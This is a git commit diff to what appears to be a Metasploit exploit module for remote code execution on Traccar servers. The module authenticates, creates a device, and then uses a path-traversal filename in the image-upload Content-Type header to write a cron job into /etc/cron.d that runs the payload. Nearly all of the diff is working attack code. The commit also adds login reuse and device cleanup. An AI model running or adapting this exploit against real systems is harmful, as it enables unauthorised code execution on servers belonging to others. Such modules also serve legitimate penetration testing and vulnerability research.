cleanup

h4x-x0r · h4x-x0r · commit 30e6af779159 · 2024-09-12T14:34:45.000+01:00
Code cleanup and better handling of different use cases.
diff --git a/modules/exploits/linux/http/traccar_rce_upload.rb b/modules/exploits/linux/http/traccar_rce_upload.rb
@@ -42,6 +42,9 @@ def initialize(info = {})
             }
           ]
         ],
+        'Payload' => {
+          'BadChars' => "\x27" # apostrophe (')
+        },
         'DefaultTarget' => 0,
         'DefaultOptions' => {
           'WfsDelay' => 75
@@ -89,10 +92,11 @@ def check
   end
 
   def exploit
+    prepare_setup
     execute_command(payload.encoded)
   end
 
-  def execute_command(cmd)
+  def prepare_setup
     print_status('Registering new user...')
     body = {
       name: datastore['USERNAME'],
@@ -112,11 +116,39 @@ def execute_command(cmd)
       fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
     end
 
+    auth_status = false
+
     # not quite necessary to check for this, since we exit all cases that are not 200 below, but this is a common error
     # to run into when this module is executed more than once without updating the provided email address
     if res.code == 400 && res.to_s.include?('Unique index or primary key violation')
-      vprint_status(res.to_s)
-      fail_with(Failure::UnexpectedReply, 'Error: The same E-mail already exists on the system')
+      print_status('The same E-mail already exists on the system, trying to authenticate with existing password...')
+      res = send_request_cgi(
+        'method' => 'POST',
+        'keep_cookies' => true,
+        'uri' => normalize_uri(target_uri.path, 'api/session'),
+        'ctype' => 'application/x-www-form-urlencoded',
+        'vars_post' => {
+          'email' => datastore['EMAIL'],
+          'password' => datastore['PASSWORD']
+        }
+      )
+
+      unless res
+        fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+      end
+
+      jsessionid = res.get_cookies.scan(/JSESSIONID=([^;]+)/).flatten[0]
+      fail_with(Failure::UnexpectedReply, 'JSESSIONID not found.') unless jsessionid
+      vprint_status("JSESSIONID: #{jsessionid}")
+
+      json = res.get_json_document
+      unless res.code == 200 && json['name'] == datastore['USERNAME'] && json['email'] == datastore['EMAIL']
+        print_status('Provide the correct password for the existing E-Mail address, or provide a new E-Mail address.')
+        fail_with(Failure::UnexpectedReply, res.to_s)
+      end
+
+      auth_status = true
+
     end
 
     unless res.code == 200
@@ -129,30 +161,35 @@ def execute_command(cmd)
       fail_with(Failure::UnexpectedReply, 'Received unexpected reply:\n' + json.to_s)
     end
 
-    print_status('Authenticating...')
-    res = send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'api/session'),
-      'ctype' => 'application/x-www-form-urlencoded',
-      'vars_post' => {
-        'email' => datastore['EMAIL'],
-        'password' => datastore['PASSWORD']
-      }
-    )
+    if auth_status == false
+      print_status('Authenticating...')
+      res = send_request_cgi(
+        'method' => 'POST',
+        'keep_cookies' => true,
+        'uri' => normalize_uri(target_uri.path, 'api/session'),
+        'ctype' => 'application/x-www-form-urlencoded',
+        'vars_post' => {
+          'email' => datastore['EMAIL'],
+          'password' => datastore['PASSWORD']
+        }
+      )
 
-    unless res
-      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
-    end
+      unless res
+        fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+      end
 
-    jsessionid = res.get_cookies.scan(/JSESSIONID=([^;]+)/).flatten[0]
-    fail_with(Failure::UnexpectedReply, 'JSESSIONID not found.') unless jsessionid
-    vprint_status("JSESSIONID: #{jsessionid}")
+      jsessionid = res.get_cookies.scan(/JSESSIONID=([^;]+)/).flatten[0]
+      fail_with(Failure::UnexpectedReply, 'JSESSIONID not found.') unless jsessionid
+      vprint_status("JSESSIONID: #{jsessionid}")
 
-    json = res.get_json_document
-    unless res.code == 200 && json['name'] == datastore['USERNAME'] && json['email'] == datastore['EMAIL']
-      fail_with(Failure::UnexpectedReply, 'Received unexpected reply:\n' + json.to_s)
+      json = res.get_json_document
+      unless res.code == 200 && json['name'] == datastore['USERNAME'] && json['email'] == datastore['EMAIL']
+        fail_with(Failure::UnexpectedReply, 'Received unexpected reply:\n' + json.to_s)
+      end
     end
+  end
 
+  def execute_command(cmd)
     name_v = Rex::Text.rand_text_alphanumeric(16)
     unique_id_v = Rex::Text.rand_text_alphanumeric(16)
 
@@ -165,9 +202,7 @@ def execute_command(cmd)
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'api/devices'),
-      'headers' => {
-        'Cookie' => "JSESSIONID=#{jsessionid}"
-      },
+      'keep_cookies' => true,
       'ctype' => 'application/json',
       'data' => body
     )
@@ -190,9 +225,7 @@ def execute_command(cmd)
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, "api/devices/#{id}/image"),
-      'headers' => {
-        'Cookie' => "JSESSIONID=#{jsessionid}"
-      },
+      'keep_cookies' => true,
       'ctype' => 'image/png',
       'data' => body
     )
@@ -208,9 +241,7 @@ def execute_command(cmd)
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, "api/devices/#{id}/image"),
-      'headers' => {
-        'Cookie' => "JSESSIONID=#{jsessionid}"
-      },
+      'keep_cookies' => true,
       'ctype' => "image/png;#{fn}=\"/b\"",
       'data' => body
     )
@@ -229,9 +260,7 @@ def execute_command(cmd)
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, "api/devices/#{id}/image"),
-      'headers' => {
-        'Cookie' => "JSESSIONID=#{jsessionid}"
-      },
+      'keep_cookies' => true,
       'ctype' => "image/png;#{fn}=\"/../../../../../../../../../etc/cron.d/#{cronfn}\"",
       'data' => body
     )
@@ -246,6 +275,23 @@ def execute_command(cmd)
       fail_with(Failure::UnexpectedReply, res.to_s)
     end
 
+    vprint_status('Cleanup: Deleting previously added device...')
+    res = send_request_cgi(
+      'method' => 'DELETE',
+      'uri' => normalize_uri(target_uri.path, "api/devices/#{id}"),
+      'headers' => {
+        'Connection' => 'close'
+      }
+    )
+
+    unless res
+      print_bad('Failed to receive a reply from the server, device removal might have failed.')
+    end
+
+    unless res.code == 204
+      print_bad('Received unexpected reply, device removal might have failed:\n' + res.to_s)
+    end
+
     # It takes up to one minute to get the cron job executed; need to wait as otherwise the handler might terminate too early
     print_status('Cronjob successfully written - waiting for execution...')
   end
